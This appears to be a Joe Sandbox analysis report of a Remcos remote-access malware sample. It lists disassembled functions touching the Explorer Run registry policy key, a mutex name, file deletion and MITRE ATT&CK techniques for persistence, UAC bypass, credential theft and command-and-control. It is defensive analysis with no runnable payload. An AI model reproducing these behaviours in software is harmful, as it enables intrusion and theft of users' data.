Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
Opcode Fuzzy Hash: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF

Function 0213EA06 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 021649D7: __onexit.LIBCMT ref: 021649DD

__Init_thread_footer.LIBCMT ref: 02141190

Strings

0kG, xrefs: 02141198
,kG, xrefs: 0214116B

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: ,kG$0kG
API String ID: 1881088180-2015055088
Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
Instruction ID: a6e6f18ed80ca5ae2ec5c2be05bbdcd261529c05d3527dec9aa1746c3bf3cfb2
Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
Instruction Fuzzy Hash: F4E0D8311C49209FC624A7389544A6C33939B0AB20B518067D01CD72C0CF196480CD5C

Function 02143C8A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0213D735,00000000,?,00000000), ref: 02143C98
RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 02143CAC

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 02143C96

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction ID: f5ccf616d3152dceeb2cd6d5211bb20df91d09d1000bf977a025b1b43263b9a8
Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction Fuzzy Hash: EEE0C27128830CFBEF144F71ED06FBA372CDB01F02F1006A5BA0A920D1CB22CE149660

Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

__Init_thread_footer.LIBCMT ref: 00410F29

Strings

0kG, xrefs: 00410F31
,kG, xrefs: 00410F04

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: ,kG$0kG
API String ID: 1881088180-2015055088
Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D

Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668

Function 0213BAD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,?,?,0213AF1A,0000005C,?,?,?,00000000), ref: 0213BADD
RemoveDirectoryW.KERNEL32(00000000,?,?,0213AF1A,0000005C,?,?,?,00000000), ref: 0213BB08

Strings

hdF, xrefs: 0213BAEB

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: DeleteDirectoryFileRemove
String ID: hdF
API String ID: 3325800564-665520524
Opcode ID: 2e0f71548beba5a730f37ec643fdbde7cff5540ab6036cf56b22bcb1e85fbdea
Instruction ID: 749d746e009138fa95a6752d7cea24146b94d511db19e649ea03e0461cf75f6e
Opcode Fuzzy Hash: 2e0f71548beba5a730f37ec643fdbde7cff5540ab6036cf56b22bcb1e85fbdea
Instruction Fuzzy Hash: 4EE08C71180B109FCB25BB349D58ADB339EAF04212F000CAAE893E3150EF34DE09CB64

Function 0213D2D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,0213EE6F,0000000D,00000033,00000000,00000032,00000000,0046739C,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0213D2DF
GetLastError.KERNEL32 ref: 0213D2EA

Strings

Rmc-0ZPVF8, xrefs: 0213D2D0

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: Rmc-0ZPVF8
API String ID: 1925916568-1485666958
Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
Instruction ID: eb34265c4e2c0e242199ca0a52d97ba72547605e56ade21354a040929f74ea32
Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
Instruction Fuzzy Hash: EAD012B4644700EBD7182770AE4975839969744702F504479F90BC99E1CBA48C809915

Function 0044F30A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 0044F30A
GetCommandLineW.KERNEL32 ref: 0044F315

Strings

`&d, xrefs: 0044F310

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CommandLine
String ID: `&d
API String ID: 3253501508-1050096727
Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
Opcode Fuzzy Hash: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08

Function 02170EF8 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,02131FBC), ref: 02170F8E
GetLastError.KERNEL32 ref: 02170F9C
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02170FF7

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 0f58a95181a4dae61de6f5672880a62f847295e3d6ed225d39871ea0fcdb7f7d
Instruction ID: 4df9e326c7892d23751c94e23a58c7c8baa5d3d515f2999ffc964e8fb0771758
Opcode Fuzzy Hash: 0f58a95181a4dae61de6f5672880a62f847295e3d6ed225d39871ea0fcdb7f7d
Instruction Fuzzy Hash: 1E41D430680386FFCF258F65C844BBEBBB5AF85724F254169E86DA71A1DB319D01CB60

Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
GetLastError.KERNEL32 ref: 00440D35
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
Opcode Fuzzy Hash: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ltlbVjClX9.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ltlbVjClX9.exe_432e3f29626986254a7b6283d16c16c05d366d53_96c31456_7fc1edef-822f-454c-ad26-4e564dc8aa5b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ltlbVjClX9.exe_432e3f29626986254a7b6283d16c16c05d366d53_96c31456_bd8c4617-4455-4ae8-aec7-7cdd8128e5c4\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ltlbVjClX9.exe_432e3f29626986254a7b6283d16c16c05d366d53_96c31456_d5af914b-f0d5-400a-add1-d467f9d95a4c\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ltlbVjClX9.exe_432e3f29626986254a7b6283d16c16c05d366d53_96c31456_dc002a0b-5e80-42c9-a1b3-80acf08ce12b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ltlbVjClX9.exe_432e3f29626986254a7b6283d16c16c05d366d53_96c31456_ef1bc2af-dd77-424f-a7f9-fbd01a47a934\Report.wer

Windows Analysis Report
ltlbVjClX9.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre